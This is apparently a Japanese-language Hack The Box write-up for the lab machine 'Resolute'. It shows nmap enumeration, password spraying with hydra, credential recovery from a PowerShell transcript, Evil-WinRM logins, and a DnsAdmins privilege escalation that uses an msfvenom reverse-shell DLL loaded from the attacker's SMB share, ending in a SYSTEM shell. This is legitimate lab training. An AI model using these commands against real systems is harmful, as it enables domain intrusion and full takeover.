Hack The Box Resolute
Resolute
tags: HTB
Medium
Procedure
User Flag
nmap
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-09 01:19:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49709/tcp open msrpc Microsoft Windows RPC 62192/tcp open tcpwrapped 63729/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.60%E=4%D=5/9%OT=53%CT=1%CU=37102%PV=Y%DS=2%DC=I%G=Y%TM=5EB603E2 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=O%TS=A) OS:SEQ(SP=101%GCD=1%ISR=108%TI=I%CI=RD%TS=A)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%TS OS:=A)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M OS:54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20 OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A= OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0 OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1 OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI OS:=N%T=80%CD=Z) Network Distance: 2 hops Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
ADのWindows Serverっぽい。
nmap script
$ sudo nmap -p445 --script smb-enum-shares,smb-enum-users 10.10.10.169 Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-09 10:38 JST PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED) | account_used: <blank> | \\10.10.10.169\ADMIN$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.169\C$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: <none> | \\10.10.10.169\IPC$: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED | Anonymous access: READ | \\10.10.10.169\NETLOGON: | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED |_ Anonymous access: <none> | smb-enum-users: | MEGABANK\abigail (RID: 6602) | Flags: Normal user account | MEGABANK\Administrator (RID: 500) | Description: Built-in account for administering the computer/domain | Flags: Password does not expire, Normal user account | MEGABANK\angela (RID: 6606) | Flags: Normal user account | MEGABANK\annette (RID: 6614) | Flags: Normal user account | MEGABANK\annika (RID: 6615) | Flags: Normal user account | MEGABANK\claire (RID: 6611) | Flags: Normal user account | MEGABANK\claude (RID: 6617) | Flags: Normal user account | MEGABANK\DefaultAccount (RID: 503) | Description: A user account managed by the system. | Flags: Password not required, Account disabled, Password does not expire, Normal user account | MEGABANK\felicia (RID: 6607) | Flags: Normal user account | MEGABANK\fred (RID: 6605) | Flags: Normal user account | MEGABANK\Guest (RID: 501) | Description: Built-in account for guest access to the computer/domain | Flags: Password not required, Account disabled, Password does not expire, Normal user account | MEGABANK\gustavo (RID: 6608) | Flags: Normal user account | MEGABANK\krbtgt (RID: 502) | Description: Key Distribution Center Service Account | Flags: Account disabled, Normal user account | MEGABANK\marcus (RID: 6603) | Flags: Normal user account | MEGABANK\marko (RID: 1111) | Full name: Marko Novak | Description: Account created. Password set to Welcome123! | Flags: Password does not expire, Normal user account | MEGABANK\melanie (RID: 10101) | Flags: Normal user account | MEGABANK\naoki (RID: 10104) | Flags: Normal user account | MEGABANK\paulo (RID: 6612) | Flags: Normal user account | MEGABANK\per (RID: 6616) | Flags: Normal user account | MEGABANK\ryan (RID: 1105) | Full name: Ryan Bertrand |_ Flags: Password does not expire, Normal user account
markoのDescriptionの欄に、Account created. Password set to Welcome123!と記載があり、かなり怪しい。
smb login attempt
marko/Welcome123!の認証情報でsmbclientを使って、ログインを試す。
$ smbclient -U marko -L 10.10.10.169 WARNING: The "syslog" option is deprecated Enter WORKGROUP\marko's password: session setup failed: NT_STATUS_LOGON_FAILURE
どうもダメっぽい、、、 どうせなら、全ユーザで辞書攻撃をしてみる。
$ hydra -L userlist.txt -p Welcome123! 10.10.10.169 smb Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-05-09 10:54:01 [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) [DATA] max 1 task per 1 server, overall 1 task, 27 login tries (l:27/p:1), ~27 tries per task [DATA] attacking smb://10.10.10.169:445/ [445][smb] host: 10.10.10.169 login: melanie password: Welcome123! 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2020-05-09 10:54:19
melanieアカウントでヒットした!
smbclientで再度ログイン。
$ smbclient -U melanie -L 10.10.10.169 WARNING: The "syslog" option is deprecated Enter WORKGROUP\melanie's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share $ smbclient -U melanie \\\\10.10.10.169\\NETLOGON WARNING: The "syslog" option is deprecated Enter WORKGROUP\melanie's password: smb: \> ls . D 0 Wed Sep 25 22:28:21 2019 .. D 0 Wed Sep 25 22:28:21 2019 10340607 blocks of size 4096. 7561451 blocks available
ログイン成功! NETLOGONには何も見当たらなかったので、SYSVOLへログイン。
$ smbclient -U melanie \\\\10.10.10.169\\SYSVOL WARNING: The "syslog" option is deprecated Enter WORKGROUP\melanie's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 25 22:28:21 2019 .. D 0 Wed Sep 25 22:28:21 2019 megabank.local D 0 Wed Sep 25 22:28:21 2019
megabank.local下のディレクトリをダウンロードしてきたが、特に情報が見当たらない。
$ tree ./ ./ ├── {31B2F340-016D-11D2-945F-00C04FB984F9} │ ├── GPT.INI │ ├── MACHINE │ │ ├── Microsoft │ │ │ └── Windows NT │ │ │ └── SecEdit │ │ │ └── GptTmpl.inf │ │ └── Scripts │ │ ├── Shutdown │ │ └── Startup │ └── USER ├── {6AC1786C-016F-11D2-945F-00C04fB984F9} │ ├── GPT.INI │ ├── MACHINE │ │ └── Microsoft │ │ └── Windows NT │ │ └── SecEdit │ │ └── GptTmpl.inf │ └── USER ├── nmap_sV_fullport.txt └── userlist.txt
入手したクレデンシャルで、サーバからさらに情報取得を試みる。
ldapdomaindumpを使う$ ldapdomaindump -u MEGABANK\\melanie -p Welcome123! 10.10.10.169 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished $ firefox *.html
ldapサーバの各種情報をダンプしてくれる。 malanieはRemote Management Usersグループに所属している。Remote Managementというのは、その名の通り、リモートでサーバをマネジメントできる機能でWindows Server 2016以降ではデフォルトでenableになっている。デフォルトのポートは5985/tcp。
Exploit
Remote Management用のshellツールを使ってアクセスする。
$ ./evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> *Evil-WinRM* PS C:\Users\melanie\Desktop> ls Directory: C:\Users\melanie\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2019 7:33 AM 32 user.txt
目的のファイルを発見、フラグゲット!!
local recon
他のユーザディレクトリがあるかチェック。ryanというユーザがいるよう。
PS C:\Users\melanie\Documents> ls ../../ Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/25/2019 10:43 AM Administrator d----- 12/4/2019 2:46 AM melanie d-r--- 11/20/2016 6:39 PM Public d----- 9/27/2019 7:05 AM ryan
C直下に隠しディレクトリが存在し、その下にはtranscriptが存在する。transcryptとは、PowerShellのログをテキストファイルに書き出したもの。!!directory walkingは大事!!
*Evil-WinRM* PS C:\> dir -hidden Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN d--hsl 9/25/2019 10:17 AM Documents and Settings d--h-- 9/25/2019 10:48 AM ProgramData d--h-- 12/3/2019 6:32 AM PSTranscripts d--hs- 9/25/2019 10:17 AM Recovery d--hs- 9/25/2019 6:25 AM System Volume Information -arhs- 11/20/2016 5:59 PM 389408 bootmgr -a-hs- 7/16/2016 6:10 AM 1 BOOTNXT -a-hs- 5/10/2020 8:35 PM 402653184 pagefile.sys *Evil-WinRM* PS C:\> cd PSTranscripts *Evil-WinRM* PS C:\PSTranscripts> dir -hidden Directory: C:\PSTranscripts Mode LastWriteTime Length Name ---- ------------- ------ ---- d--h-- 12/3/2019 6:45 AM 20191203 *Evil-WinRM* PS C:\PSTranscripts> cd 20191203 *Evil-WinRM* PS C:\PSTranscripts\20191203> dir -hidden Directory: C:\PSTranscripts\20191203 Mode LastWriteTime Length Name ---- ------------- ------ ---- -arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
中を見ると、ryanはbackupディレクトリをマウントしたログが残っている。パスワードがコマンドライン引数で渡されている。
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
ryanアカウントでログインできた。
$ /opt/evil-winrm/evil-winrm.rb -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> whoami megabank\ryan
ryanはContractorsで、DnsAdminsのグループに所属している。'dnsadmin exploid'でぐぐると権限昇格の記事がヒットした。リバースシェルを呼び出すdllをdnsのプロセスに読ませるらしい。記事通りdllを作って、
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -f dll > privesc.dll
自分の手元でSMBサーバ立てて、
$ python3 /opt/impacket/examples/smbserver.py share ./
リスナーをたてて、
$ nc -lvnp 4444
DLLを読み込ませて、dnsを再起動すると、
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.15.3\share\privesc.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 2444 FLAGS :
リバースシェルが起動した。権限昇格完了。あとはフラグをとるだけ。
$ nc -lnvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.10.10.169 56314 received! Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system